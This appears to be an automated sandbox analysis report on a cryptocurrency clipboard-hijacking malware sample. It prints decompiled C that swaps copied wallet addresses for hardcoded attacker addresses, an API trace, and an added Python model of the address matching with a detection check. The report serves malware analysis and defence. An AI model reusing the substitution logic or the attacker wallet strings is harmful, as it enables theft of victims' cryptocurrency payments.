                                                                                  										}
                                                                                  									}
                                                                                  								}
                                                                                  								if(_v8 < 0x62 || _v8 > 0x69) {
                                                                                  									return 0;
                                                                                  								} else {
                                                                                  									goto L63;
                                                                                  								}
                                                                                  							}
                                                                                  							if(_v8 < 0x2a || _v8 > 0x30) {
                                                                                  								return 0;
                                                                                  							} else {
                                                                                  								goto L63;
                                                                                  							}
                                                                                  						}
                                                                                  						if(_v8 < 0x32 || _v8 > 0x38) {
                                                                                  							return 0;
                                                                                  						} else {
                                                                                  							goto L63;
                                                                                  						}
                                                                                  					}
                                                                                  					if(_v8 < 0x19 || _v8 > 0x23) {
                                                                                  						return 0;
                                                                                  					}
                                                                                  					goto L63;
                                                                                  				} else {
                                                                                  					if(_v8 < 0x5f || _v8 > 0x6a) {
                                                                                  						return 0;
                                                                                  					}
                                                                                  					L63:
                                                                                  					if(StrStrW(_a4, L"bitcoincash:") != 0) {
                                                                                  						L76:
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x31) {
                                                                                  							if(_v8 != 0x30) {
                                                                                  								_v12 = "1A6utf8R2zfLL7X31T5QRHdQyAx16BjdFD";
                                                                                  							} else {
                                                                                  								_v12 = "12SJv5p8xUHeiKnXPCDaKCMpqvXj7TABT5BSxGt3csz9Beuc";
                                                                                  							}
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x33) {
                                                                                  							if((_a4[1] & 0x0000ffff) != 0x50) {
                                                                                  								_v12 = "3BJS4zYwrnfcJMm4xLxRcsa69ght8n6QWz";
                                                                                  							} else {
                                                                                  								_v12 = "3PFzu8Rw8aDNhDT6d5FMrZ3ckE4dEHzogfg";
                                                                                  							}
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x6c) {
                                                                                  							_v12 = "lskbjrchofkmqtugfw28ot7jzv96u75xzyb5bvoop";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x71) {
                                                                                  							_v12 = "qpzj59cm0dcyxy9597x927fx0wzu75nns5lsm2452k";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x58) {
                                                                                  							_v12 = "XgWbWpuyPGney7hcS9vZ7eNhkj7WcvGcj8";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x44) {
                                                                                  							_v12 = "DPcSSyFAYLu4aEB4s1Yotb8ANwtx6bZEQG";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x30) {
                                                                                  							_v12 = "0xb899fC445a1b61Cdd62266795193203aa72351fE";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x4c) {
                                                                                  							_v12 = "LRDpmP5wHZ82LZimzWDLHVqJPDSpkM1gZ7";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x72) {
                                                                                  							_v12 = "r1eZ7W1fmUT9tiUZwK6rr3g6RNiE4QpU1";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x54) {
                                                                                  							_v12 = "TBdEh7r35ywUD5omutc2kDTX7rXhnFkxy5";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x74) {
                                                                                  							if((_a4[1] & 0x0000ffff) == 0x31 || (_a4[1] & 0x0000ffff) == 0x32) {
                                                                                  								_v12 = "t1T7mBRBgTYPEL9RPPBnAVgcftiWUPBFWyy";
                                                                                  							} else {
                                                                                  								if((_a4[1] & 0x0000ffff) != 0x65 || (_a4[2] & 0x0000ffff) != 0x72 || (_a4[3] & 0x0000ffff) != 0x72 || (_a4[4] & 0x0000ffff) != 0x61) {
                                                                                  									_v12 = "tz1fpBZAB1jz7RsefBjT94VR3h5VzL4akg6L";
                                                                                  								} else {
                                                                                  									_v12 = "terra1smy8jurjwm790qrt5z3qrsyrx9a3lcwehvzmw3";
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x68) {
                                                                                  							_v12 = "hxc65003fbd738014cf286edf92f9ddac689ec4de5";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x51) {
                                                                                  							_v12 = "QYHny85SWYTLcZFFNNoVovyN15eNbwZdW6";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x52) {
                                                                                  							_v12 = "RRQ9QGcqnHEqJAbcEjs9X3EYsEfXrZPvEi";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x4e) {
                                                                                  							_v12 = "NC7YTU5BSOVDYRUPWA3KUXP437AEZ7JNE2H3EYGI";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x41) {
                                                                                  							_v12 = "AGUqhQzF52Qwbvun5wQSrpokPtCC4b9yiX";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x53) {
                                                                                  							_v12 = "SNCjaBTsinQUDTjBvBoDLVm2AnN2qXeMCs";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x7a) {
                                                                                  							_v12 = "zil14rxudm29xzmu9cyk0mcwvrlxm086evuawjy2ev";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x73) {
                                                                                  							_v12 = "s1dSgik6QuCDrRnw9yvtrLCvRLDemi2juJe";
                                                                                  						}
                                                                                  						if(StrStrW(_a4, L"bitcoincash") != 0) {
                                                                                  							_v12 = "bitcoincash:qpzj59cm0dcyxy9597x927fx0wzu75nns5lsm2452k";
                                                                                  						}
                                                                                  						if(StrStrW(_a4, L"cosmos") != 0) {
                                                                                  							_v12 = "cosmos156h8kejuwm3n7ywpwajplfzahgum8lenvkezny";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x34) {
                                                                                  							_v12 = "4AtjkCVKbtEC3UEN77SQHuH9i1XkzNiRi5VCbA2XGsJh46nJSXfGQn4GjLuupCqmC57Lo7LvKmFUyRfhtJSvKvuw3h9ReKK";
                                                                                  						}
                                                                                  						if(StrStrW(_a4, L"addr") != 0) {
                                                                                  							_v12 = "addr1q8ujsfumgrpjvp2v6s3cfndz7yqf7cgpnjfpdlqxfphwfa0e9qneksxrycz5e4prsnx69ugqnassr8yjzm7qvjrwun6s6dfsrt";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x61 && (_a4[1] & 0x0000ffff) != 0x64) {
                                                                                  							_v12 = "aPSfmf1H5DNksgcUMV39NPJcSj832L2okm";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x46) {
                                                                                  							_v12 = "FeGdLZrnbVLsmiY9tZ4ssoRjdLDxiigQBL";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x47) {
                                                                                  							if(_v8 != 0x38) {
                                                                                  								_v12 = "GSdrN7W3GsqsxqaXg4x9k5C8cf1uJeoFFg";
                                                                                  							} else {
                                                                                  								_v12 = "GCVFMTUKNLFBGHE3AHRJH4IJDRZGWOJ6JD2FQTFQAAIQR64ALD7QJHUY";
                                                                                  							}
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x62) {
                                                                                  							if(StrStrW(_a4, L"bnb") != 0) {
                                                                                  								_v12 = "bnb1rcg9mnkzna2tw4u8ughyaj6ja8feyj87hss9ky";
                                                                                  							}
                                                                                  							if(StrStrW(_a4, L"band") != 0) {
                                                                                  								_v12 = "band1f2nuxcxahrph4n4gpy4lndsp5q342fz0yjh945";
                                                                                  							}
                                                                                  							if(StrStrW(_a4, L"bc1") != 0) {
                                                                                  								_v12 = "bc1qzs2hs5dvyx04h0erq4ea72sctcre2rcwadsq2v";
                                                                                  							}
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x55) {
                                                                                  							_v12 = "U33390790";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x45) {
                                                                                  							_v12 = "E36963824";
                                                                                  						}
                                                                                  						if(( *_a4 & 0x0000ffff) == 0x42) {
                                                                                  							_v12 = "B36461211";
                                                                                  						}
                                                                                  						_v16 = lstrlenA(_v12);
                                                                                  						if(_v16 != 0) {
                                                                                  							_v24 = GlobalAlloc(0x2002, _v16 + 1);
                                                                                  							if(_v24 != 0) {
                                                                                  								_v20 = GlobalLock(_v24);
                                                                                  								if(_v20 != 0) {
                                                                                  									memcpy(_v20, _v12, _v16 + 1);
                                                                                  									GlobalUnlock(_v24);
                                                                                  									if(OpenClipboard(0) != 0) {
                                                                                  										EmptyClipboard();
                                                                                  										SetClipboardData(1, _v24);
                                                                                  										CloseClipboard();
                                                                                  									}
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  						return 1;
                                                                                  					}
                                                                                  					_v28 = 0;
                                                                                  					while(_v28 < _v8) {
                                                                                  						if(( *_a4 & 0x0000ffff) != 0x31 || (_a4[_v28] & 0x0000ffff) != 0x4f && (_a4[_v28] & 0x0000ffff) != 0x49 && (_a4[_v28] & 0x0000ffff) != 0x6c) {
                                                                                  							_t237 = _v28;
                                                                                  							_push(_a4[_t237] & 0x0000ffff);
                                                                                  							L0040F058();
                                                                                  							_t391 = _t391 + 4;
                                                                                  							if(_t237 != 0) {
                                                                                  								L75:
                                                                                  								_v28 = _v28 + 1;
                                                                                  								continue;
                                                                                  							}
                                                                                  							_t238 = _v28;
                                                                                  							_push(_a4[_t238] & 0x0000ffff);
                                                                                  							L0040F05E();
                                                                                  							_t391 = _t391 + 4;
                                                                                  							if(_t238 != 0) {
                                                                                  								goto L75;
                                                                                  							}
                                                                                  							return 0;
                                                                                  						} else {
                                                                                  							return 0;
                                                                                  						}
                                                                                  					}
                                                                                  					goto L76;
                                                                                  				}
                                                                                  			}


                                                                                  APIs
                                                                                  • lstrlenW.KERNEL32(00000000), ref: 00403498
                                                                                  • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 0040366F
                                                                                  • StrStrW.SHLWAPI(00000000,cosmos), ref: 0040369A
                                                                                  • StrStrW.SHLWAPI(00000000,addr), ref: 004036C2
                                                                                  • StrStrW.SHLWAPI(00000000,bitcoincash:), ref: 0040372D
                                                                                  • isalpha.NTDLL ref: 0040379F
                                                                                  • isdigit.NTDLL ref: 004037B6
                                                                                  • StrStrW.SHLWAPI(00000000,bitcoincash), ref: 004039AB
                                                                                  • StrStrW.SHLWAPI(00000000,cosmos), ref: 004039C5
                                                                                  • StrStrW.SHLWAPI(00000000,addr), ref: 004039F1
                                                                                  • StrStrW.SHLWAPI(00000000,bnb), ref: 00403A67
                                                                                  • StrStrW.SHLWAPI(00000000,band), ref: 00403A81
                                                                                  • StrStrW.SHLWAPI(00000000,bc1), ref: 00403A9B
                                                                                  • lstrlenA.KERNEL32(00000000), ref: 00403AE6
                                                                                  • GlobalAlloc.KERNEL32(00002002,-00000001), ref: 00403B01
                                                                                  • GlobalLock.KERNEL32 ref: 00403B14
                                                                                  • memcpy.NTDLL(00000000,00000000,-00000001), ref: 00403B32
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00403B3E
                                                                                  • OpenClipboard.USER32(00000000), ref: 00403B46
                                                                                  • EmptyClipboard.USER32 ref: 00403B50
                                                                                  • SetClipboardData.USER32 ref: 00403B5C
                                                                                  • CloseClipboard.USER32 ref: 00403B62
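The API chain above is the sample's clipboard hijacker: `StrStrW` searches the clipboard text for the address prefixes listed as its second argument (`bitcoincash:`, `cosmos`, `addr`, `bnb`, `band`, `bc1`), `isalpha`/`isdigit` walk the characters that follow a hit, and a replacement string is then placed in the clipboard with the standard `GlobalAlloc(0x2002 = GMEM_MOVEABLE | GMEM_DDESHARE)` / `GlobalLock` / `memcpy` / `GlobalUnlock` / `OpenClipboard` / `EmptyClipboard` / `SetClipboardData` / `CloseClipboard` sequence. The Python below is an added example written for this page, not code from the report or from the sample: it models that matching logic on plain strings so the needles can be exercised offline, and adds the defender-side check a clipboard monitor would run. The chain names attached to each needle, the requirement that bech32 prefixes be followed by the `1` separator, the minimum candidate length, and every wallet string are assumptions or constructed placeholders, not facts taken from the binary.

```python
"""Clipper-style address matching modelled on the StrStrW/isalpha/isdigit trace.

Added example for this report page; not the sample's code. Needle-to-chain
labels, the '1'-separator rule, MIN_ADDRESS_LEN and all wallet strings are
assumptions / constructed test data.
"""
import string

ALNUM = set(string.ascii_letters + string.digits)

# (needle as passed to StrStrW, needle must be followed by the bech32 '1' separator)
# Chain labels in the comments are my annotation, not something the report states.
NEEDLES = [
    ("bitcoincash:", False),  # Bitcoin Cash CashAddr URI form
    ("cosmos", True),         # Cosmos bech32, hrp "cosmos"
    ("addr", True),           # Cardano bech32, hrp "addr"
    ("bnb", True),            # BNB Beacon Chain bech32, hrp "bnb"
    ("band", True),           # Band Protocol bech32, hrp "band"
    ("bc1", False),           # Bitcoin SegWit bech32 (the '1' is part of the needle)
]

# Assumption: real addresses of these families are far longer than this, so a
# bare word such as "band" or "address" in a sentence is not treated as a hit.
MIN_ADDRESS_LEN = 20


def find_address_candidate(text):
    """Return (needle, candidate) for the first address-like run in `text`, else None.

    Mirrors the trace: substring search for each needle, then an isalpha/isdigit
    walk to find where the address ends.
    """
    for needle, needs_sep in NEEDLES:
        start = 0
        while (pos := text.find(needle, start)) >= 0:
            end = pos + len(needle)
            if needs_sep:
                # bech32: hrp is immediately followed by the '1' separator
                if end < len(text) and text[end] == "1":
                    end += 1
                else:
                    start = pos + 1
                    continue
            # the sample's isalpha()/isdigit() loop: extend over the alphanumeric run
            while end < len(text) and text[end] in ALNUM:
                end += 1
            if end - pos >= MIN_ADDRESS_LEN:
                return needle, text[pos:end]
            start = pos + 1
    return None


def clipper_substitute(text, attacker_wallets):
    """Emulate the clipper's effect on one clipboard payload.

    If an address of a family the attacker has a wallet for is found, it is
    replaced; otherwise the clipboard content is returned untouched.
    """
    hit = find_address_candidate(text)
    if hit is None:
        return text
    needle, candidate = hit
    replacement = attacker_wallets.get(needle)
    if replacement is None:
        return text
    return text.replace(candidate, replacement, 1)


def detect_substitution(copied, pasted):
    """Defender-side check for a clipboard monitor.

    True when the text the user copied and the text now in the clipboard both
    contain an address of the same family but the address itself differs.
    """
    a = find_address_candidate(copied)
    b = find_address_candidate(pasted)
    return a is not None and b is not None and a[0] == b[0] and a[1] != b[1]


# Constructed placeholder wallets for the demonstration, not addresses from the sample.
ATTACKER_WALLETS = {
    "bc1": "bc1qattackerwallet000000000000000",
    "cosmos": "cosmos1attackerwallet0000000000000",
}

if __name__ == "__main__":
    victim = "pay me at bc1qvictimwallet0000000000000000 thanks"
    hijacked = clipper_substitute(victim, ATTACKER_WALLETS)
    print(hijacked)
    print("substitution detected:", detect_substitution(victim, hijacked))
```

A real monitor would snapshot the clipboard on every `WM_CLIPBOARDUPDATE` and compare against what the foreground application last wrote; the comparison itself is what `detect_substitution` shows, and the `needs_sep` / `MIN_ADDRESS_LEN` rules are the kind of extra filtering the sample may or may not apply (the trace shows only the substring search and the character-class checks).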
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.348011861.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.348006591.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348024370.0000000000410000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348032877.0000000000413000.00000008.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.348037573.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Id4zlrsrZ4.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Clipboard$Global$lstrlen$AllocCloseDataEmptyLockOpenUnlockisalphaisdigitmemcpy
                                                                                  • String ID: 8$addr$addr$band$bc1$bitcoincash$bitcoincash:$bitcoincash:$bnb$cosmos$cosmos
                                                                                  • API String ID: 2780752356-1510930353
                                                                                  • Opcode ID: 2c5db9e79411c39fb51cbdfc5cfebaa0b71a785cac5ae4d9f6a16cbf4b45c0c1
                                                                                  • Instruction ID: b665d6e5f15c84b57736a5ca98929a0149febd319ec054e6d13fe4cbe208dc28
                                                                                  • Opcode Fuzzy Hash: 2c5db9e79411c39fb51cbdfc5cfebaa0b71a785cac5ae4d9f6a16cbf4b45c0c1
                                                                                  • Instruction Fuzzy Hash: CE222B70A00218EACB24CF55C0845BE7FB6AF42756F60C46BE8856B390D7799FC1DB98
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  C-Code - Quality: 100%
                                                                                  			E00406979() {
                                                                                  				signed int _t1392;
                                                                                  				signed int _t1393;
                                                                                  				signed int _t1394;
                                                                                  				signed int _t1398;
                                                                                  				signed int _t1408;
                                                                                  				intOrPtr _t1409;
                                                                                  				signed int _t1419;
                                                                                  				intOrPtr _t1420;
                                                                                  				signed int _t1430;
                                                                                  				intOrPtr _t1431;
                                                                                  				signed int _t1441;
                                                                                  				intOrPtr _t1442;
                                                                                  				signed int _t1452;
                                                                                  				intOrPtr _t1453;
                                                                                  				signed int _t1463;
                                                                                  				intOrPtr _t1464;
                                                                                  				signed int _t1474;
                                                                                  				intOrPtr _t1475;
                                                                                  				signed int _t1485;
                                                                                  				intOrPtr _t1486;
                                                                                  				signed int _t1496;
                                                                                  				intOrPtr _t1497;
                                                                                  				signed int _t1507;
                                                                                  				intOrPtr _t1508;
                                                                                  				signed int _t1518;
                                                                                  				intOrPtr _t1519;
                                                                                  				signed int _t1529;
                                                                                  				intOrPtr _t1530;
                                                                                  				signed int _t1540;
                                                                                  				intOrPtr _t1541;
                                                                                  				signed int _t1551;
                                                                                  				intOrPtr _t1552;
                                                                                  				signed int _t1562;
                                                                                  				intOrPtr _t1563;
                                                                                  				intOrPtr _t1572;
                                                                                  				intOrPtr _t1573;
                                                                                  				intOrPtr _t1574;
                                                                                  				signed int _t1575;
                                                                                  				signed int _t1581;
                                                                                  				signed int _t1582;
                                                                                  				signed int _t1583;
                                                                                  				signed int _t1584;
                                                                                  				signed int _t1588;
                                                                                  				signed int _t1591;
                                                                                  				signed int _t1592;
                                                                                  				signed int _t1593;
                                                                                  				signed int _t1594;
                                                                                  				signed int _t1598;
                                                                                  				signed int _t1601;
                                                                                  				signed int _t1602;
                                                                                  				signed int _t1603;
                                                                                  				signed int _t1604;
                                                                                  				signed int _t1608;
                                                                                  				signed int _t1611;
                                                                                  				signed int _t1612;
                                                                                  				signed int _t1613;
                                                                                  				signed int _t1614;
                                                                                  				signed int _t1618;
                                                                                  				signed int _t1621;
                                                                                  				signed int _t1622;
                                                                                  				signed int _t1623;
                                                                                  				signed int _t1624;
                                                                                  				signed int _t1628;
                                                                                  				signed int _t1631;
                                                                                  				signed int _t1632;
                                                                                  				signed int _t1633;
                                                                                  				signed int _t1634;
                                                                                  				signed int _t1638;
                                                                                  				signed int _t1641;
                                                                                  				signed int _t1642;
                                                                                  				signed int _t1643;
                                                                                  				signed int _t1644;
                                                                                  				signed int _t1648;
                                                                                  				signed int _t1651;
                                                                                  				signed int _t1652;
                                                                                  				signed int _t1653;
                                                                                  				signed int _t1654;
                                                                                  				signed int _t1658;
                                                                                  				signed int _t1661;
                                                                                  				signed int _t1662;
                                                                                  				signed int _t1663;
                                                                                  				signed int _t1664;
                                                                                  				signed int _t1668;
                                                                                  				signed int _t1671;
                                                                                  				signed int _t1672;
                                                                                  				signed int _t1673;
                                                                                  				signed int _t1674;
                                                                                  				signed int _t1678;
                                                                                  				signed int _t1681;
                                                                                  				signed int _t1682;
                                                                                  				signed int _t1683;
                                                                                  				signed int _t1684;
                                                                                  				signed int _t1688;
                                                                                  				signed int _t1691;
                                                                                  				signed int _t1692;
                                                                                  				signed int _t1693;
                                                                                  				signed int _t1694;
                                                                                  				signed int _t1698;
                                                                                  				signed int _t1701;
                                                                                  				signed int _t1702;
                                                                                  				signed int _t1703;
                                                                                  				signed int _t1704;
                                                                                  				signed int _t1708;
                                                                                  				signed int _t1711;
                                                                                  				signed int _t1712;
                                                                                  				signed int _t1713;
                                                                                  				signed int _t1714;
                                                                                  				signed int _t1718;
                                                                                  				signed int _t1721;
                                                                                  				signed int _t1722;
                                                                                  				signed int _t1723;
                                                                                  				signed int _t1724;
                                                                                  				signed int _t1728;
                                                                                  				signed int _t1731;
                                                                                  				signed int _t1743;
                                                                                  				intOrPtr _t1744;
                                                                                  				intOrPtr _t1750;
                                                                                  				intOrPtr _t1751;
                                                                                  				intOrPtr _t1752;
                                                                                  				signed int _t1753;
                                                                                  				intOrPtr _t1762;
                                                                                  				intOrPtr _t1763;
                                                                                  				intOrPtr _t1764;
                                                                                  				signed int _t1765;
                                                                                  				intOrPtr _t1774;
                                                                                  				intOrPtr _t1775;
                                                                                  				intOrPtr _t1776;
                                                                                  				signed int _t1777;
                                                                                  				intOrPtr _t1786;
                                                                                  				intOrPtr _t1787;
                                                                                  				intOrPtr _t1788;
                                                                                  				signed int _t1789;
                                                                                  				intOrPtr _t1798;
                                                                                  				intOrPtr _t1799;
                                                                                  				intOrPtr _t1800;
                                                                                  				signed int _t1801;
                                                                                  				intOrPtr _t1810;
                                                                                  				intOrPtr _t1811;
                                                                                  				intOrPtr _t1812;
                                                                                  				signed int _t1813;
                                                                                  				intOrPtr _t1822;
                                                                                  				intOrPtr _t1823;
                                                                                  				intOrPtr _t1824;
                                                                                  				signed int _t1825;
                                                                                  				intOrPtr _t1834;
                                                                                  				intOrPtr _t1835;
                                                                                  				intOrPtr _t1836;
                                                                                  				signed int _t1837;
                                                                                  				intOrPtr _t1846;
                                                                                  				intOrPtr _t1847;
                                                                                  				intOrPtr _t1848;
                                                                                  				signed int _t1849;
                                                                                  				intOrPtr _t1858;
                                                                                  				intOrPtr _t1859;
                                                                                  				intOrPtr _t1860;
                                                                                  				signed int _t1861;
                                                                                  				intOrPtr _t1870;
                                                                                  				intOrPtr _t1871;
                                                                                  				intOrPtr _t1872;
                                                                                  				signed int _t1873;
                                                                                  				intOrPtr _t1882;
                                                                                  				intOrPtr _t1883;
                                                                                  				intOrPtr _t1884;
                                                                                  				signed int _t1885;
                                                                                  				intOrPtr _t1894;
                                                                                  				intOrPtr _t1895;
                                                                                  				intOrPtr _t1896;
                                                                                  				signed int _t1897;
                                                                                  				intOrPtr _t1906;
                                                                                  				intOrPtr _t1907;
                                                                                  				intOrPtr _t1908;
                                                                                  				signed int _t1909;
                                                                                  				intOrPtr _t1918;
                                                                                  				intOrPtr _t1919;
                                                                                  				intOrPtr _t1920;
                                                                                  				signed int _t1921;
                                                                                  				intOrPtr _t2038;
                                                                                  				intOrPtr _t2039;
                                                                                  				intOrPtr _t2040;
                                                                                  				intOrPtr _t2045;
                                                                                  				intOrPtr _t2046;
                                                                                  				intOrPtr _t2047;
                                                                                  				intOrPtr _t2052;
                                                                                  				intOrPtr _t2053;
                                                                                  				intOrPtr _t2054;
                                                                                  				intOrPtr _t2059;
                                                                                  				intOrPtr _t2060;
                                                                                  				intOrPtr _t2061;
                                                                                  				intOrPtr _t2066;
                                                                                  				intOrPtr _t2067;
                                                                                  				intOrPtr _t2068;
                                                                                  				intOrPtr _t2073;
                                                                                  				intOrPtr _t2074;
                                                                                  				intOrPtr _t2075;
                                                                                  				intOrPtr _t2080;
                                                                                  				intOrPtr _t2081;
                                                                                  				intOrPtr _t2082;
                                                                                  				intOrPtr _t2087;
                                                                                  				intOrPtr _t2088;
                                                                                  				intOrPtr _t2089;
                                                                                  				intOrPtr _t2094;
                                                                                  				intOrPtr _t2095;
                                                                                  				intOrPtr _t2096;
                                                                                  				intOrPtr _t2101;
                                                                                  				intOrPtr _t2102;
                                                                                  				intOrPtr _t2103;
                                                                                  				intOrPtr _t2108;
                                                                                  				intOrPtr _t2109;
                                                                                  				intOrPtr _t2110;
                                                                                  				intOrPtr _t2115;
                                                                                  				intOrPtr _t2116;
                                                                                  				intOrPtr _t2117;
                                                                                  				intOrPtr _t2122;
                                                                                  				intOrPtr _t2123;
                                                                                  				intOrPtr _t2124;
                                                                                  				intOrPtr _t2129;
                                                                                  				intOrPtr _t2130;
                                                                                  				intOrPtr _t2131;
                                                                                  				intOrPtr _t2136;
                                                                                  				intOrPtr _t2137;
                                                                                  				intOrPtr _t2138;
                                                                                  				intOrPtr _t2143;
                                                                                  				intOrPtr _t2144;
                                                                                  				intOrPtr _t2145;
                                                                                  				void* _t2149;
                                                                                  
                                                                                  				L0:
                                                                                  				while(1) {
                                                                                  					L0:
                                                                                  					 *((intOrPtr*)(_t2149 - 0x1c)) =  *((intOrPtr*)(_t2149 - 0x1c)) + 0x10;
                                                                                  					L1:
                                                                                  					_t1391 =  *(_t2149 + 0xc) << 4;
                                                                                  					if( *((intOrPtr*)(_t2149 - 0x1c)) < _t1391) {
                                                                                  						L2:
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                  						_t1392 =  *(_t2149 - 0xc);
                                                                                  						_t1572 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1572 + _t1392 * 8 - 0x2c8);
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                  						_t1662 =  *(_t2149 - 0xc);
                                                                                  						_t1846 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1846 + _t1662 * 8 - 0x280);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1846 + _t1662 * 8 - 0x27c);
                                                                                  						_t1663 =  *(_t2149 - 0xc);
                                                                                  						_t1847 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1847 + _t1663 * 8 - 0x40);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1847 + _t1663 * 8 - 0x3c);
                                                                                  						_t1664 =  *(_t2149 - 0xc);
                                                                                  						_t1848 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1496 =  *(_t2149 - 0xc);
                                                                                  						_t2101 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1848 + _t1664 * 8 - 0x48) &  *(_t2101 + _t1496 * 8 - 0x60) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1848 + _t1664 * 8 - 0x44) &  *(_t2101 + _t1496 * 8 - 0x5c) ^  *(_t2149 - 4);
                                                                                  						_t1849 =  *(_t2149 - 0xc);
                                                                                  						_t1497 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1668 =  *(_t2149 - 0xc);
                                                                                  						_t2102 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1497 + _t1849 * 8 - 0xb0) &  *(_t2102 + _t1668 * 8 - 0x1d0) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1497 + _t1849 * 8 - 0xac) &  *(_t2102 + _t1668 * 8 - 0x1cc) ^  *(_t2149 - 4);
                                                                                  						L0040F198();
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						L0040F19E();
                                                                                  						_t1671 =  *(_t2149 - 0xc);
                                                                                  						_t2103 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2103 + 0x48 + _t1671 * 8) =  *(_t2149 - 8) ^  *(_t2149 - 8);
                                                                                  						 *(_t2103 + 0x4c + _t1671 * 8) =  *(_t2149 - 4) ^  *(_t2149 - 4);
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 0x18);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 0x14);
                                                                                  						_t1672 =  *(_t2149 - 0xc);
                                                                                  						_t1858 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1858 + _t1672 * 8 - 0x278);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1858 + _t1672 * 8 - 0x274);
                                                                                  						_t1673 =  *(_t2149 - 0xc);
                                                                                  						_t1859 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t2149 - 8) ^  *(_t1859 + _t1673 * 8 - 0x38);
                                                                                  						 *(_t2149 - 4) =  *(_t2149 - 4) ^  *(_t1859 + _t1673 * 8 - 0x34);
                                                                                  						_t1674 =  *(_t2149 - 0xc);
                                                                                  						_t1860 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1507 =  *(_t2149 - 0xc);
                                                                                  						_t2108 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						 *(_t2149 - 8) =  *(_t1860 + _t1674 * 8 - 0x40) &  *(_t2108 + _t1507 * 8 - 0x58) ^  *(_t2149 - 8);
                                                                                  						 *(_t2149 - 4) =  *(_t1860 + _t1674 * 8 - 0x3c) &  *(_t2108 + _t1507 * 8 - 0x54) ^  *(_t2149 - 4);
                                                                                  						_t1861 =  *(_t2149 - 0xc);
                                                                                  						_t1508 =  *((intOrPtr*)(_t2149 + 8));
                                                                                  						_t1678 =  *(_t2149 - 0xc);
                                                                                  						_t2109 =  *((intOrPtr*)(_t2149 + 8));
